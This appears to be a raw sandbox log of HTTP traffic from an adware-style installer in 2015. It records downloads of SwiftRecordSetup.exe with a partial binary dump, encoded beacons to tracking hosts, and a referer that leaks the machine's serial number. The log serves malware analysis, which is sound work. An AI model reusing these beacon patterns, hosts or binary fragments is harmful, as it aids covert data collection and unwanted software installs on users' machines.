X-Amz-Cf-Id: zwCsIRI7uJmG0GDmg42btP8yPMgBf3jdWlcdCGKxGVnOQ19tEwyrdw==
HTTP/1.1 302 Moved Temporarily..Content-Type: text/html..Content-Lengt
h: 0..Connection: keep-alive..Date: Sat, 18 Apr 2015 23:35:49 GMT..Loc
ation: hXXp://dlrkbt247pbk6.cloudfront.net/3428_92a5d683c188790231b1aa
2af09de41e/2.pak..Server: nginx..X-Cache: Miss from cloudfront..Via: 1
.1 2dc430fff474a8f2dc029f6910b5eecc.cloudfront.net (CloudFront)..X-Amz
-Cf-Id: zwCsIRI7uJmG0GDmg42btP8yPMgBf3jdWlcdCGKxGVnOQ19tEwyrdw==..



GET /sd?is=sm HTTP/1.1
Range: bytes=261636-
User-Agent: Better Installer(Mozilla)
Host: install-cdn.theswiftrecord.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Pragma: no-cache
Content-Type: application/octet-stream
Server: Microsoft-IIS/7.5
Content-Disposition: attachment; filename=SwiftRecordSetup.exe
X-AspNet-Version: 4.0.30319
SVR: SP004C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Cache-Control: private, max-age=86400
Expires: Sun, 19 Apr 2015 23:35:14 GMT
Date: Sat, 18 Apr 2015 23:35:14 GMT
Content-Range: bytes 261636-523271/523272
Content-Length: 261636
Connection: keep-alive
$P../9.,.....d.z$...TK......?RU..kD.M..n.r..Ol;[...`..{......_.=....5.
.Nc..r...te..C..jI..^.....k...'OM[3.rW.!).7...t...l......`7....=WK{.&l
t;Q....#.r. Juq..z..5....FD..:..)H...'.j...R..B...y.e...{H.:.k&...l.V.
p4....</{[email protected].@.....>B..y....7....Q...=..(.....
.....G..... ....o'...J.E%.K.;......d.....S..w.vJ......:..(^...G....Z.Y
3{s...S..me..L...n...()..=.Y. .0.B.....EA#O.Q...O..%..;0c....?.f.>.
Ry...h.p...<..k..x.'...[9......b...9.q-FA...4.]...SFo..=....S...z..
C/..].b.l..:..2...7_L...b...O....E.7P.tk.57.p.uL.M....q]..aF.i...f.2.z
....c.w#.."d2...*>..z...r......s..<..0...F..b.I.mjD.;.V.v....R..
...@.]c....R..U.df.....|....).>......Q....*....;C_.l.....a...i..Gt.
.g.n../.Q.. 8w....b.a...N}z.-.S-3.Z..u....9*..`.8.1.!2./........o2....
....j.eK..:...^...a......I...~o.i.........r...hi.*m...._......e.Y.aYF.
3c.7....;.p.*g.|O/Z.......b.........I...t..5..".np......?...U........b
X`9.....F..^...~.p5.g..?..j...F);Q..A..S..Dt.........agR.B..l......5.K
...T.....q..1.........r....&....KV.{..)j...p.3.N.~.f....i........e...C
..|.a.WE....KD.,^.hH.].*....8..)..}]y...Z.F .r...{.?*..2..#.M.Q....8#e
..s1....t...&e*..#.d.1.u.....EY.....p.W~I... .#.C.#....m..0i.vV....~..
.lq].>.[.!.....\....X.'.....l..1x...a.D....g..X..#......n...w..Y...
Gya,..v0.nH%.................x..,.`|.X..3.zo..<!9-1....2.[..Q#..K..
iP..k.....}5..1X.p7m$...py........c.b..C...U0.............G....Z>..
.....}.P|k4.].....A#....Z EC.~0.,.....09.j..2.K....g....7{.0..R....i.`
2...U..;z..w....R......w.....^...g.F}.$g.:..H..}.W."..0..N]~>..
<<< skipped >>>


GET /v4/searchprotect/267123711_198339_B48A115F?action=visit.heartbeat.smt&update0=ref,smt&update1=nation,us&update2=language,en&update3=version,4.0.1.2105 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Sat, 18 Apr 2015 23:36:35 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.36 ms","message":"store 2 action and 4 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Sat, 18 Apr 201
5 23:36:35 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encod
ing: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-
version: v4..48..{"stats":"ok","time":"1.36 ms","message":"store 2 act
ion and 4 update "}..0..



GET /16669.ashx?e=M7A8vgjJHrj4MZomVx105Tcx3WaqDyI8mkbcHfsclGUDt2EUeZbtRVHmS0Zrngqa/u6z7Uinv/hOGjGA0YZy30CN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DoltPqJisDtFzxhmiufAlHSiFcsvZ1RPeaMg glO3beFp/JLGd4 8dfjKLkxr/pAddBafUMrGaOhUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKefkrhIRbuxR4i7hnHdhdcduQ/fd4pcRUO5yQynRUZI5Y08jY48xBJr38Km4JMgAXQ== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:16 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:16 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......


GET /16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1WvQ80kRIPHQS3QlB3kfGAhd3tM3uO6UFTierot47/97D/ I1VjLpwx1pXiNwermIPJaqcLsqnN14kxDoAIuanBxQI7ctFNLW92Fd9fuzXpLdMZuOl10dRSTozwxTsvpnVcXOyU386ibkNsTaFJlXWyu yt25iEwyPbjsvnWTmObjOwEISYEO9NS ukMkugzkCYw3hkUtKZ53m3WJytHC0lJh BoO5y99Rgk9gttj5ejpE= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1Wv0orsJnWEPXcHpxdxO 8fxymF904v4t2D/nc4J1Acff1o3N21n5Sarb/kefI4WQ1LxyQvi1UiSlerMrg41l/Ly7CST5Ycto3cE6nMAQ0x67lxVrNxtz1yEZXZrelYJPLUYdPT9nrlrOwzThv/VXsFFUkiD//SLljTIUUNPzNqpdQ IQcLyoqcrddz3lZB7h1Z HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1WvFODQ1lUn  gE8SFHLIEPsDtTHkxJSIEbrNszNzik7HYYan0yy1LdwNMNN2yVHejOq rbptvtlqPG4Lnbcm9hh1KSSkgkzJM10ClxJsX5qO1ZySIyJVh8l4rtrWyhaWBtd3 uKF6e7H0TmouIR1qWdOQVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlBRsXHd/3niy HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1Wv2PzudKEWOJmRnC4IZxP4Ze5DeqO3aOt23qz6fCOm/YRKYywqw4E7oN090kXNAy/Jfzd3xSGgk5YE8XIWrh60PYXV1rPYBwrFqy2cd4qoQDl0oePvh0n93NexvF9Z3oAvVYgO0yHAHEt6xicSXLpiF7kRgG1RponZW17SH9ileexTK6LFIjgpsLAf6b7pWvtY4 ujlnobk4U= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:18 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1Wv2mmPmExLeVKUfdGpw3nUgsMJc2jBTfyiqyYb9Bykje2/uCIFUAhjXasyuDjWX8vLsJJPlhy2jdwTqcwBDTHruXFWs3G3PXIRldmt6Vgk8tRh09P2euWs7DNOG/9VewUVSSIP/9IuWNMhRQ0/M2ql1D4hBwvKipyt13PeVkHuHVk= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:18 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1WveKRzCupNECsE8SFHLIEPsM3UKcKGG9ndxuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJeK7a1soWlgbXd/rihenux9E5qLiEdalnTkFRMCFkWSPRZtwp8OumXRtkYVxBhYUpQUbFx3f954sg== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:18 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e=obiBp3WOda80dGo5FFu/Rbi3muUffR3j7ZTHYXaLDVh4E7mrr1h80pGhRXiiBAM3T7kVztDActJUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKVPs4lYRsXUDmVvO2Kq2gv SYeASUebplkc NtS6nt7dj0N7bp/0QtT6UR/N6r03qZR90anDedSCtJwJAW8Acv9 CRTrfRId1tm02TdpGphdkpKwHx8Q4rlQbJJDfLoDoPECFOpxid0SQGNdQduoWijrX K4UHUEDKlS/RjlzGHj/fUmHjSuJJOba7jijygSN7xWHd62hcvEpYVIHBu2Qb16RDbKGwVPgtHLR5I4FQx69MbrO5DXfoloWbsH70W5C5 DlEXBO5VA2R O qPBqBgVJqUrTWk2/WuAKm8uNLGe2M/VB50wH9zL8Hq6Ocmu0jR8nfSY9YHcwn0GoGPKVvk TnksFA3b2r56EmzsP6UAVArsosbOUjUCKiRklP9YGqUs1rjapz18LnSy9mQHKSmnXTm7wyBWFg== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:19 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e=obiBp3WOda80dGo5FFu/Rbi3muUffR3j7ZTHYXaLDVh4E7mrr1h80pGhRXiiBAM3T7kVztDActJUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKVPs4lYRsXUDmVvO2Kq2gv SYeASUebplkc NtS6nt7dj0N7bp/0QtT1NzI6eOpBwJuuc9uz6WdZs IILilpWF2V9PoQYImhoi5ITADj fT8xuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJeK7a1soWlgbXd/rihenux9E5qLiEdalnTkFRMCFkWSPRZtwp8OumXRtkYVxBhYUpQUbFx3f954sg== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:19 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e=Feo0TQZfu6KSwU3ck0Ywnv3K4Um6afGyT8HkmPir9E9AXdQqxJ1vaxGgYkoQykSFfl0yK7ww8bSszUmDSXfYhX1D9868HonIj9NWOW5Z1BfUQsLxVIQuR V8oZ3 d72V1JJpRAUOpYSeY/e3xqcYN8/PCEWlF5n7X4l9XCm/Va/LS8QKBdwSe29z1KklHinBKYX3Ti/i3YMgCmKZYKupqVXwtCZfo4Zr9nup2DtfDPrER/kwSJZSa/eJIUUI29KJua/YhbaaQtbhLKDJ7gHH44roFtpr/bY5tMM9FOiO9IIcxXLgDRmHLIbieN4dwMAiQCgrTWge9c5pV1IGllrHIPLxQ3i9AquwZAf1w iJbx4= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:19 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /monetization.gif?event=4&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000805&country=ua&app=70299&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400147&asw=0_1073750533_-2147475456_2048&browser=ff&rnd=1429400147 HTTP/1.1
Host: logs.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:36:01 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1429400161.dop017.am4.t,1429400161.cds058.am4.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Sat, 18 Apr 
2015 23:36:01 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-A
live..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07
 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 
35..Content-Type: image/gif..X-HW: 1429400161.dop017.am4.t,1429400161.
cds058.am4.c..GIF89a.............,...........D..;..



GET /monetization.gif?event=3&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000171&country=ua&app=70121&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400147&asw=0_1073750533_-2147475456_2048&browser=ff&rnd=1429400147 HTTP/1.1
Host: logs.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:50 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1429400150.dop019.am4.t,1429400150.cds058.am4.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Sat, 18 Apr 
2015 23:35:50 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-A
live..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07
 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 
35..Content-Type: image/gif..X-HW: 1429400150.dop019.am4.t,1429400150.
cds058.am4.c..GIF89a.............,...........D..;..



GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?4f0b436e9b257d53 HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Feb 2015 00:37:01 GMT
If-None-Match: "80b4d90ca4fd01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com


HTTP/1.1 304 Not Modified
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Feb 2015 00:37:01 GMT
ETag: "80b4d90ca4fd01:0"
Cache-Control: max-age=604800
Date: Sat, 18 Apr 2015 23:38:21 GMT
Connection: keep-alive
HTTP/1.1 304 Not Modified..Content-Type: application/octet-stream..Las
t-Modified: Tue, 24 Feb 2015 00:37:01 GMT..ETag: "80b4d90ca4fd01:0"..C
ache-Control: max-age=604800..Date: Sat, 18 Apr 2015 23:38:21 GMT..Con
nection: keep-alive..



GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.usertrust.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:38:22 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Fri, 17 Apr 2015 16:29:13 GMT
Expires: Tue, 21 Apr 2015 16:29:13 GMT
ETag: 03FFF360B04093F2B5F7E0EF66E4BF224AEB293D
Cache-Control: max-age=232850,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: h6edcaocsp5
Content-Length: 471
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0.........z4.&...&T....$.T...2015041
7162913Z0s0q0I0... ........|.fT...D.b&...e{.z.......z4.&...&T....$.T..
.B.......R.K.$&.K....20150417162913Z....20150421162913Z0...*.H........
.......... .Ea,VU......o5.....yZ. .]..ST.|f..v`v..........k..N]n....S.
.w.*...)...I8"4.....3..........P.h.w.V. ......F...f ...$C..k[=^}y.*.&l
t;.\.....L.R.I.TY,...p=....L....'...C..B.......3....!x.>tL:..Di.o..
..z.]Z..~.m....`'.f..-Z.v....Y.....E.2WD9..X...W...z...P...



GET /sd?is=sm HTTP/1.1
Range: bytes=0-
User-Agent: Better Installer(Mozilla)
Host: install-cdn.theswiftrecord.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Pragma: no-cache
Content-Type: application/octet-stream
Server: Microsoft-IIS/7.5
Content-Disposition: attachment; filename=SwiftRecordSetup.exe
X-AspNet-Version: 4.0.30319
SVR: SP004C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Cache-Control: private, max-age=86400
Expires: Sun, 19 Apr 2015 23:35:14 GMT
Date: Sat, 18 Apr 2015 23:35:14 GMT
Content-Range: bytes 0-523271/523272
Content-Length: 523272
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................Z....... ...0.......p....@.........
................. ......l........................................s....
......................................................................
.............p...............................text....X.......Z........
.......... ..`.rdata.......p.......^..............@[email protected].......
.....p..............@....ndata.......p...........................rsrc.
...............t..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h [email protected]...\r@._^3.
[.....L$...nD...Si.. ..VW.T.....tO.q.3.;5.nD.sB..i.. ...D.......t.G...
..t...O..t .....u...3....3...F.. ..;5.nD.r._^[...U..QQ.U.SV..i.. .
<<< skipped >>>


GET /images/Tokyo/tokyo_sprite_full.png HTTP/1.1
Accept: */*
Referer: hXXp://sub.goveba.info/downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: d31kvmpgk4j074.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 26401
Connection: keep-alive
Server: nginx
Date: Tue, 14 Apr 2015 08:52:17 GMT
Last-Modified: Tue, 14 Apr 2015 08:31:54 GMT
ETag: "552cd07a-6721"
Expires: Tue, 14 Apr 2015 09:02:17 GMT
Cache-Control: max-age=600
Accept-Ranges: bytes
Age: 187
X-Cache: Hit from cloudfront
Via: 1.1 f008e15fd2ddeadaa683028122cfffe5.cloudfront.net (CloudFront)
X-Amz-Cf-Id: GroOhCxEw8-ips0N7uYb1GvibdQbJQFO1t1N3FdoFoJAyR8f0OELXA==
.PNG........IHDR...............-)....tEXtSoftware.Adobe ImageReadyq.e&
lt;..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:080CC8DDBD6511E3B018CC78
0203A0F9" xmpMM:DocumentID="xmp.did:080CC8DEBD6511E3B018CC780203A0F9"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:080CC8DBBD6511E3B0
18CC780203A0F9" stRef:documentID="xmp.did:080CC8DCBD6511E3B018CC780203
A0F9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>..!C..c.IDATx......G}.....9....,....;...Mx.
1..!.l...`............{..%.q...o..qp ...1.flA0..E.d......vW..W/S..3..I
gF:....5=..=}..3....._.B>......!...%.....RJr....e...m......M...uW*.
.v..j.J.b.~.w.7QI/....{.@...)]....}.Ugf......eM.u..].N."c%.,.V...;.5..
}.v.......A...l>.;.>O....Lo..ku^......3.8....x./M.G]5y.(P....p..
.X..^.z.....R._ ..m..u/|.......:D.Z....\........;\....k.....|x>7\."
....RLi.$.%ZWo\......o.]]q...|.r.......Y.3.mal...d{{..W.....fQ.-......
.j5..e.....6............k(......b^k.....|miA....A$..(;o.??D.p.S5S'..KW
.......=....>..H..f.5....N.t...6 .......0w.0.`.......x.y....S{.
<<< skipped >>>


GET /app/ping.ashx?e=043Mckb8LnjKYf/qJ5z9H SrE0ez3DjNOEav83SZIOEyIvs8NVvu9kXFDxkTgufFt5aWEmvF1lmyibNNhHQuhoY2d8FdDMrliViAEPFo6Yp/1ErfmLF8//Y1HJKKgNFGH6nxT6mrRhaKj C8ts/rBwTxchauHrQ9hdXWs9gHCsWrLZx3iqhAOXSh4  HSf3cXZ8qiEfUAdDFv3UUxaCmaxO5DUMAeJYUVsXXNrU8MbsN7/ITptlmJcAeXrDcfXn1 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
Host: rephelper.youtubeaccelerator.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:35 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=AZwPyJy3TZhPNjxRBLtb45HdX0JUIFUOt8f6YpiR28K/M iZRiJnRnHdTB6jkze/avGlMWAqZVF1vusSxtcPBYeCQx1we AsujghDckn/xgt lphzBReO6bK2Q7GGGnWJ281Et5v 1ivpBvzhFxOqDKzz2j1DKRExuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJegMBsN/V/kj2ANygAkC0Bha6lfIH DnKMZiwRfiQgeW Lmf6eHphUt9 inPTLZDtg= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
Host: rephelper.youtubeaccelerator.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:35 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=uWabAt9SLcwd5zMhdw4gNv3K4Um6afGy2rWxJ8ENzMu9gdZ7vVVoir9hXn5fpF0AWcMhU uLDRW9bNt46T8oebkv4QX1tDHZYCpHZc9ZUaG9AEuBwweR31o8H6qezB8RqTFlxlzn4VIl8JkmZ/Wy9wpDKX/a3tH594khRQjb0om5r9iFtppC1uEsoMnuAcfjiugW2mv9tjkZtVgFRKAib0rRptMshTXZhki2VnUOF/T8SaNRCRsmEQLMEicbqKjXDxJ w6ryxW8= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
Host: rephelper.youtubeaccelerator.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:36 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 18 Apr 20
15 23:35:36 GMT..Content-Length: 0..



GET /utility.gif?report=fdata&f=1&c=000820&i=100&n=init_start_funnel_step_name&rnd=1429400187 HTTP/1.1
Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: xn0zEwR7SjJ8B /KpxjVu5iJDXPxPlSX2gxf3UyCs/5/tBdp9oyUDnsGN4pIqOPplwqVUipF4ns=
x-amz-request-id: B1BE092E1C6C0BE6
Date: Sat, 18 Apr 2015 23:36:28 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: xn0zEw
